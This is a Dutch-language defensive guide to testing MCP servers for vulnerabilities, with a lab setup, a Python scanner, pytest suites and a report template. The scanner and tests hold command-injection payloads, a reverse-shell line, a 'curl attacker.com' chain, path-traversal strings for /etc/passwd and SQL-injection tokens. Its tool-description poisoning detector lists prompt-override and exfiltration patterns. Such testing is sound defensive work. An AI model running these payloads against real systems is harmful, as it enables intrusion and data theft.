MCP-beveiligingstesten: hoe je MCP-servers test op kwetsbaarheden
Een defensief gerichte handleiding voor het beveiligingstesten van MCP-serverimplementaties -- methodologie voor MCP-beveiligingsbeoordelingen, scantools, veelvoorkomende testcases voor auth-bypass, injectie, traversal en datalekken, met werkende testscripts en rapportagesjablonen.
Het beveiligingstesten van MCP-servers vraagt om een gespecialiseerde methodologie, omdat MCP op het snijvlak ligt van traditionele applicatiebeveiliging (HTTP, authenticatie, invoervalidatie) en AI-specifieke risico's (prompt injection, tokenamplificatie, tool description poisoning). Standaardscanners voor webapplicaties missen MCP-specifieke kwetsbaarheden, en AI-beveiligingstools richten zich doorgaans op het LLM in plaats van op de tool-infrastructuur.
Methodologie voor MCP-beveiligingsbeoordeling
Overzicht van de fasen
┌───────────────────────────────────────────────────────────────┐
│ Fasen van de MCP-beveiligingsbeoordeling │
├────────────┬──────────────────────────────────────────────────┤
│ Fase 1 │ Verkenning en ontdekking │
│ │ - Alle MCP-servers binnen scope identificeren │
│ │ - Tools, transports en capabilities inventariseren│
│ │ - Trustgrenzen en dataflows in kaart brengen │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 2 │ Authenticatie- en autorisatietesten │
│ │ - Testen op ongeauthenticeerde toegang │
│ │ - Token-/credentialafhandeling testen │
│ │ - Autorisatiescopes per tool verifiëren │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 3 │ Invoervalidatietesten │
│ │ - Command injection in alle parameters │
│ │ - Path traversal in bestandsoperaties │
│ │ - SQL-injectie in databasetools │
│ │ - Analyse van tool description poisoning │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 4 │ Sessie- en statustesten │
│ │ - Data-isolatie tussen sessies │
│ │ - Sessiefixatie en -kaping │
│ │ - Statusopruiming bij verbreken verbinding │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 5 │ Resource- en kostentesten │
│ │ - Tokenamplificatie (sampling-misbruik) │
│ │ - Misbruik van outputgrootte │
│ │ - Effectiviteit van rate limiting │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 6 │ Supply chain- en configuratiereview │
│ │ - Verificatie van pakketintegriteit │
│ │ - Validatie van SDK-versie │
│ │ - Beoordeling van netwerkblootstelling │
│ │ - Review van container-/sandboxconfiguratie │
├────────────┼──────────────────────────────────────────────────┤
│ Fase 7 │ Rapportage en remediatie │
│ │ - Documentatie van bevindingen │
│ │ - Risicoscoring en prioritering │
│ │ - Remediatie-aanbevelingen │
│ │ - Verificatie via hertest │
└────────────┴──────────────────────────────────────────────────┘
Een veilige testomgeving opzetten
Docker-gebaseerd testlab
# docker-compose.test.yaml
# Geïsoleerde testomgeving voor MCP-beveiligingstesten
version: "3.8"
services:
# Doel-MCP-server (de server die wordt getest)
target-mcp-server:
build:
context: ./target-server
container_name: mcp-test-target
ports:
- "8080:8080"
environment:
- MCP_AUTH_ENABLED=true
- MCP_AUTH_TOKEN=test-token-for-testing-only
- MCP_WORKSPACE=/workspace
volumes:
- test-workspace:/workspace
networks:
- test-network
# MCP-beveiligingsscanner
mcp-scanner:
build:
context: ./scanner
dockerfile: Dockerfile.scanner
container_name: mcp-scanner
environment:
- TARGET_URL=http://target-mcp-server:8080
- TEST_TOKEN=test-token-for-testing-only
volumes:
- ./reports:/reports
networks:
- test-network
depends_on:
- target-mcp-server
# Opname van netwerkverkeer
tcpdump:
image: nicolaka/netshoot
container_name: mcp-traffic-capture
command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
volumes:
- ./captures:/captures
networks:
- test-network
cap_add:
- NET_RAW
- NET_ADMIN
volumes:
test-workspace:
networks:
test-network:
driver: bridge#!/bin/bash
# setup-test-lab.sh -- Zet de MCP-beveiligingstestomgeving op
set -euo pipefail
echo "[*] Creating test workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
echo "SECRET_API_KEY=sk-test-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt
echo "[*] Creating reports directory..."
mkdir -p reports captures
echo "[*] Starting test environment..."
docker compose -f docker-compose.test.yaml up -d
echo "[*] Waiting for services..."
sleep 5
echo "[*] Verifying test environment..."
curl -s http://localhost:8080/health && echo " -- MCP-server gezond"
echo "[+] Testomgeving gereed."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"MCP-beveiligingsscanner
"""
MCP-beveiligingsscanner
Allesomvattende tool voor beveiligingstesten van MCP-serverimplementaties.
"""
import asyncio
import aiohttp
import json
import time
import logging
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime
from enum import Enum
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")
class Severity(Enum):
CRITICAL = "critical"
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
INFO = "info"
@dataclass
class Finding:
"""Een beveiligingsbevinding uit de scan."""
title: str
severity: Severity
category: str
description: str
evidence: str = ""
remediation: str = ""
references: list[str] = field(default_factory=list)
cvss_score: float = 0.0
@dataclass
class ScanResult:
"""Volledige scanresultaten."""
target_url: str
scan_start: datetime
scan_end: Optional[datetime] = None
findings: list[Finding] = field(default_factory=list)
tools_discovered: list[dict] = field(default_factory=list)
server_info: dict = field(default_factory=dict)
class MCPSecurityScanner:
"""
Beveiligingsscanner voor MCP-servers.
Test op veelvoorkomende kwetsbaarheden uit MCP-beveiligingsonderzoek.
"""
def __init__(self, target_url: str, auth_token: str = None):
self.target_url = target_url.rstrip("/")
self.auth_token = auth_token
self.result = ScanResult(
target_url=target_url,
scan_start=datetime.utcnow(),
)
def _headers(self) -> dict:
headers = {"Content-Type": "application/json"}
if self.auth_token:
headers["Authorization"] = f"Bearer {self.auth_token}"
return headers
async def _jsonrpc_call(self, session: aiohttp.ClientSession,
method: str, params: dict = None,
msg_id: int = 1) -> dict:
"""Stuur een JSON-RPC-verzoek naar de MCP-server."""
payload = {
"jsonrpc": "2.0",
"method": method,
"id": msg_id,
}
if params:
payload["params"] = params
async with session.post(
f"{self.target_url}/messages/",
json=payload,
headers=self._headers(),
) as resp:
return await resp.json()
async def run_full_scan(self):
"""Voer alle beveiligingstestfasen uit."""
async with aiohttp.ClientSession() as session:
logger.info("Starting MCP security scan: %s", self.target_url)
await self.phase1_discovery(session)
await self.phase2_authentication(session)
await self.phase3_input_validation(session)
await self.phase4_session_isolation(session)
await self.phase5_resource_abuse(session)
self.result.scan_end = datetime.utcnow()
logger.info(
"Scan complete. Findings: %d (Critical: %d, High: %d)",
len(self.result.findings),
sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
)
return self.result
# === Fase 1: Ontdekking ===
async def phase1_discovery(self, session: aiohttp.ClientSession):
"""Inventariseer de capabilities en tools van de MCP-server."""
logger.info("Phase 1: Discovery")
# Probeer te initialiseren
try:
init_result = await self._jsonrpc_call(session, "initialize", {
"protocolVersion": "2024-11-05",
"clientInfo": {"name": "security-scanner", "version": "1.0"},
"capabilities": {},
})
self.result.server_info = init_result.get("result", {})
logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
except Exception as e:
logger.warning("Initialize failed: %s", e)
# Tools opsommen
try:
tools_result = await self._jsonrpc_call(session, "tools/list")
tools = tools_result.get("result", {}).get("tools", [])
self.result.tools_discovered = tools
logger.info("Discovered %d tools", len(tools))
# Analyseer tool descriptions op injectiepatronen
for tool in tools:
self._analyze_tool_description(tool)
except Exception as e:
logger.warning("Tool enumeration failed: %s", e)
def _analyze_tool_description(self, tool: dict):
"""Controleer de tool description op injectiepatronen."""
import re
desc = tool.get("description", "")
name = tool.get("name", "unknown")
suspicious_patterns = [
(r"(?i)\byou must\b", "Imperative instruction in tool description"),
(r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
(r"https?://", "External URL in tool description"),
(r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
(r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
]
for pattern, desc_text in suspicious_patterns:
if re.search(pattern, desc):
self.result.findings.append(Finding(
title=f"Suspicious tool description: {name}",
severity=Severity.HIGH,
category="tool_description_poisoning",
description=desc_text,
evidence=f"Tool '{name}' description: {desc[:300]}",
remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
references=["OWASP ASI-03"],
))
# === Fase 2: Authenticatie ===
async def phase2_authentication(self, session: aiohttp.ClientSession):
"""Test de authenticatiecontroles."""
logger.info("Phase 2: Authentication")
# Test ongeauthenticeerde toegang
unauth_headers = {"Content-Type": "application/json"}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=unauth_headers,
) as resp:
if resp.status == 200:
body = await resp.json()
if "result" in body:
self.result.findings.append(Finding(
title="Unauthenticated access to MCP server",
severity=Severity.CRITICAL,
category="authentication",
description=(
"MCP server accepts tool listing without authentication. "
"Any network-reachable client can enumerate and call tools."
),
evidence=f"HTTP 200 response to unauthenticated tools/list",
remediation="Implement Bearer token or mTLS authentication.",
references=["VulnerableMCP", "MCP Auth Gaps"],
cvss_score=9.1,
))
elif resp.status in (401, 403):
logger.info("Authentication required (good): HTTP %d", resp.status)
except Exception as e:
logger.warning("Auth test failed: %s", e)
# Test met een ongeldig token
bad_headers = {
"Content-Type": "application/json",
"Authorization": "Bearer invalid-token-12345",
}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=bad_headers,
) as resp:
if resp.status == 200:
self.result.findings.append(Finding(
title="Authentication bypass with invalid token",
severity=Severity.CRITICAL,
category="authentication",
description="Server accepts invalid authentication token.",
evidence=f"HTTP 200 with token 'invalid-token-12345'",
remediation="Verify token validation logic.",
cvss_score=9.8,
))
except Exception as e:
logger.warning("Invalid token test failed: %s", e)
# === Fase 3: Invoervalidatie ===
async def phase3_input_validation(self, session: aiohttp.ClientSession):
"""Test invoervalidatie over alle tools heen."""
logger.info("Phase 3: Input Validation")
for tool in self.result.tools_discovered:
tool_name = tool.get("name", "")
schema = tool.get("inputSchema", {})
properties = schema.get("properties", {})
for param_name, param_schema in properties.items():
param_type = param_schema.get("type", "string")
if param_type == "string":
# Test command injection
await self._test_command_injection(
session, tool_name, param_name
)
# Test path traversal (als de parameternaam op een bestandspad wijst)
if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
await self._test_path_traversal(
session, tool_name, param_name
)
async def _test_command_injection(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""Test een parameter op command injection."""
payloads = [
("basic_semicolon", "test; id"),
("pipe", "test | cat /etc/passwd"),
("backtick", "test `id`"),
("dollar_paren", "test $(whoami)"),
("newline", "test\nid"),
("and_chain", "test && curl attacker.com"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
# Controleer of de injectie output opleverde die op uitvoering wijst
result_text = json.dumps(result)
injection_indicators = ["uid=", "root:", "www-data", "nobody"]
for indicator in injection_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Command injection in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="command_injection",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to command injection via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
remediation=(
"Use parameterized command execution (shell=False). "
"Validate input against allowlist patterns."
),
references=["CVE-2025-6514", "OWASP Command Injection"],
cvss_score=9.6,
))
break
except Exception:
continue
async def _test_path_traversal(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""Test een parameter op path traversal."""
payloads = [
("dot_dot_slash", "../../../etc/passwd"),
("absolute", "/etc/passwd"),
("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
("null_byte", "valid.txt\x00../../../etc/passwd"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
result_text = json.dumps(result)
passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
for indicator in passwd_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Path traversal in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="path_traversal",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to path traversal via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse contains: {indicator}",
remediation=(
"Resolve and canonicalize paths before access. "
"Verify resolved path is within allowed base directory."
),
references=["CVE-2025-68145", "CWE-22"],
cvss_score=8.6,
))
break
except Exception:
continue
# === Fase 4: Sessie-isolatie ===
async def phase4_session_isolation(self, session: aiohttp.ClientSession):
"""Test de data-isolatie tussen sessies."""
logger.info("Phase 4: Session Isolation")
# Dit vereist twee aparte verbindingen
# Zoek een tool die data opslaat/ophaalt
write_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["save", "write", "remember", "store", "set"])]
read_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["read", "recall", "get", "retrieve", "load"])]
if not write_tools or not read_tools:
logger.info("No write/read tool pair found for isolation testing")
return
logger.info("Testing session isolation with %s / %s",
write_tools[0]["name"], read_tools[0]["name"])
# Let op: voor volledige isolatietesten moeten twee aparte
# SSE-verbindingen worden opgezet. Dit staat beschreven in de testscripts hieronder.
# === Fase 5: Resource-misbruik ===
async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
"""Test resourcelimieten en rate limiting."""
logger.info("Phase 5: Resource Abuse")
# Test rate limiting
burst_count = 0
for i in range(50):
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
headers=self._headers(),
) as resp:
if resp.status == 429:
logger.info("Rate limited at request %d (good)", i)
break
burst_count += 1
except Exception:
break
if burst_count >= 50:
self.result.findings.append(Finding(
title="No rate limiting on MCP tool calls",
severity=Severity.HIGH,
category="rate_limiting",
description=(
f"Server accepted {burst_count} rapid requests without rate limiting. "
f"This enables denial-of-wallet and brute force attacks."
),
evidence=f"Sent {burst_count} requests in burst, all returned 200",
remediation="Implement rate limiting per client IP and per session.",
references=["MCP Denial of Wallet"],
))
# Test limieten op outputgrootte
for tool in self.result.tools_discovered:
if "query" in tool.get("name", "").lower():
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool["name"],
"arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
})
result_size = len(json.dumps(result))
if result_size > 1_000_000:
self.result.findings.append(Finding(
title=f"No output size limit on {tool['name']}",
severity=Severity.MEDIUM,
category="resource_abuse",
description=f"Tool returned {result_size} bytes without truncation.",
remediation="Implement output size limits on all tools.",
))
except Exception:
continue
def generate_report(self, format: str = "json") -> str:
"""Genereer het beveiligingsbeoordelingsrapport."""
if format == "json":
return json.dumps({
"target": self.result.target_url,
"scan_start": self.result.scan_start.isoformat(),
"scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
"summary": {
"total_findings": len(self.result.findings),
"critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
"high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
"medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
"low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
"tools_discovered": len(self.result.tools_discovered),
},
"server_info": self.result.server_info,
"findings": [
{
"title": f.title,
"severity": f.severity.value,
"category": f.category,
"description": f.description,
"evidence": f.evidence,
"remediation": f.remediation,
"references": f.references,
"cvss_score": f.cvss_score,
}
for f in sorted(self.result.findings,
key=lambda x: x.cvss_score, reverse=True)
],
}, indent=2)
return ""
# CLI-runner
async def main():
import argparse
parser = argparse.ArgumentParser(description="MCP Security Scanner")
parser.add_argument("target", help="MCP server URL")
parser.add_argument("--token", help="Authentication token")
parser.add_argument("--output", default="reports/mcp-scan.json", help="Output file")
args = parser.parse_args()
scanner = MCPSecurityScanner(args.target, auth_token=args.token)
await scanner.run_full_scan()
report = scanner.generate_report()
with open(args.output, "w") as f:
f.write(report)
print(f"\nReport written to: {args.output}")
print(f"Findings: {len(scanner.result.findings)}")
if __name__ == "__main__":
asyncio.run(main())Losse testscripts
Authenticatie-bypass-tests
"""
mcp_test_auth.py -- Testcases voor authenticatie-bypass bij MCP-servers.
"""
import pytest
import aiohttp
import asyncio
class TestMCPAuthentication:
"""Test de authenticatiecontroles op MCP-servers."""
TARGET = "http://localhost:8080"
@pytest.mark.asyncio
async def test_no_token_rejected(self):
"""Een verzoek zonder token moet worden geweigerd."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={"Content-Type": "application/json"},
) as resp:
assert resp.status in (401, 403), \
f"Unauthenticated request accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_invalid_token_rejected(self):
"""Een verzoek met een ongeldig token moet worden geweigerd."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer invalid-token",
},
) as resp:
assert resp.status in (401, 403), \
f"Invalid token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_expired_token_rejected(self):
"""Een verzoek met een verlopen token moet worden geweigerd."""
# Gebruik een testtoken waarvan bekend is dat het verlopen is
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer expired-test-token-2025",
},
) as resp:
assert resp.status in (401, 403), \
f"Expired token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_empty_bearer_rejected(self):
"""Een leeg bearer-token moet worden geweigerd."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer ",
},
) as resp:
assert resp.status in (401, 403), \
f"Empty bearer token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_sql_injection_in_token(self):
"""SQL-injectie in het tokenveld moet veilig worden geweigerd."""
injection_tokens = [
"' OR '1'='1",
"admin'--",
"\" OR \"1\"=\"1",
"1; DROP TABLE tokens;",
]
async with aiohttp.ClientSession() as session:
for token in injection_tokens:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {token}",
},
) as resp:
assert resp.status in (401, 403), \
f"SQL injection token accepted: {token}"Command-injectie-tests
"""
mcp_test_injection.py -- Testcases voor command injection.
"""
import pytest
import aiohttp
import json
INJECTION_PAYLOADS = {
"semicolon": "test; id",
"pipe_to_shell": "test | bash",
"backtick": "`id`",
"dollar_paren": "$(whoami)",
"dollar_brace": "${IFS}cat${IFS}/etc/passwd",
"newline": "test\nid",
"carriage_return": "test\r\nid",
"ampersand": "test && id",
"or_chain": "test || id",
"subshell": "(id)",
"redirect": "test > /tmp/pwned",
"reverse_shell": "test; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
"python_exec": "test; python3 -c 'import os;os.system(\"id\")'",
"null_byte": "test\x00; id",
"base64_decode": "test; echo aWQ= | base64 -d | bash",
}
class TestCommandInjection:
"""Test alle toolparameters op command injection."""
TARGET = "http://localhost:8080"
TOKEN = "test-token-for-testing-only"
@pytest.fixture
async def session(self):
async with aiohttp.ClientSession() as s:
yield s
@pytest.fixture
async def tools(self, session):
"""Ontdek de beschikbare tools."""
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
return data.get("result", {}).get("tools", [])
@pytest.mark.asyncio
@pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
async def test_injection_blocked(self, session, tools, payload_name, payload):
"""Verifieer dat injectie-payloads worden geblokkeerd voor alle string-parameters."""
for tool in tools:
tool_name = tool["name"]
for param_name in tool.get("inputSchema", {}).get("properties", {}):
async with session.post(
f"{self.TARGET}/messages/",
json={
"jsonrpc": "2.0",
"method": "tools/call",
"id": 1,
"params": {
"name": tool_name,
"arguments": {param_name: payload},
},
},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
result_text = json.dumps(data).lower()
# Deze strings wijzen op succesvolle commando-uitvoering
dangerous_outputs = [
"uid=", "root:", "www-data", "nobody:",
"/bin/bash", "/bin/sh", "permission denied",
]
for indicator in dangerous_outputs:
assert indicator not in result_text, (
f"COMMAND INJECTION: {tool_name}.{param_name} "
f"with payload '{payload_name}' produced output "
f"containing '{indicator}'"
)De tests uitvoeren
#!/bin/bash
# run-mcp-security-tests.sh -- Voer alle MCP-beveiligingstests uit
set -euo pipefail
TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-test-token-for-testing-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"
echo "=== MCP Security Test Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""
# Voer de Python-scanner uit
echo "[*] Running MCP Security Scanner..."
python3 mcp_scanner.py "$TARGET" \
--token "$TOKEN" \
--output "$REPORT_DIR/scanner-report.json"
# Voer de pytest-testsuites uit
echo ""
echo "[*] Running Authentication Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_auth.py -v --tb=short \
--junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log"
echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_injection.py -v --tb=short \
--junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log"
echo ""
echo "[*] Generating summary report..."
python3 << PYEOF
import json, glob, os
report_dir = "$REPORT_DIR"
findings = []
# Verzamel de bevindingen van de scanner
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
with open(scanner_report) as f:
data = json.load(f)
findings.extend(data.get("findings", []))
print(f"\n{'='*60}")
print(f" MCP Security Assessment Summary")
print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
count = sum(1 for f in findings if f.get("severity") == severity)
if count > 0:
print(f" {severity.upper()}: {count}")
if findings:
print(f"\n Top findings:")
for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOFRapportagesjabloon
{
"report_metadata": {
"title": "MCP Server Security Assessment Report",
"version": "1.0",
"date": "2026-03-24",
"assessor": "Security Team",
"classification": "CONFIDENTIAL"
},
"executive_summary": {
"scope": "Security assessment of [MCP Server Name] version [X.Y.Z]",
"methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
"overall_risk": "HIGH|MEDIUM|LOW",
"key_findings": [
"Finding summary 1",
"Finding summary 2"
],
"recommendation": "Address all CRITICAL and HIGH findings before production deployment"
},
"scope": {
"target_server": "Server name and version",
"transport_type": "HTTP+SSE | stdio",
"tools_tested": ["tool1", "tool2"],
"test_environment": "Docker-based isolated lab",
"exclusions": ["Any areas not tested"]
},
"findings": [
{
"id": "MCP-FINDING-001",
"title": "Finding title",
"severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
"cvss_score": 9.6,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"category": "authentication|injection|traversal|session|resource",
"status": "OPEN|REMEDIATED|ACCEPTED",
"description": "Detailed description of the vulnerability",
"impact": "What an attacker could achieve",
"steps_to_reproduce": [
"Step 1",
"Step 2"
],
"evidence": "Screenshot, log output, or response data",
"remediation": {
"short_term": "Immediate mitigation",
"long_term": "Architectural fix"
},
"references": ["CVE-XXXX-XXXXX", "OWASP reference"]
}
],
"recommendations": {
"immediate": ["Actions for this week"],
"short_term": ["Actions for next 30 days"],
"long_term": ["Architectural improvements"]
}
}Referenties
- VulnerableMCP Project Methodology: Systematische aanpak voor het ontdekken van MCP-kwetsbaarheden
- OWASP ASI: Agentic Security Initiative -- richtlijnen voor beveiligingstesten van AI-agent-infrastructuur
- OWASP Testing Guide: Web Application Security Testing
- PTES: Penetration Testing Execution Standard -- aangepast voor MCP
- MCP Security Guide: Allesomvattend MCP-dreigingsmodel
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Referentiekwetsbaarheden die in de testcases worden gebruikt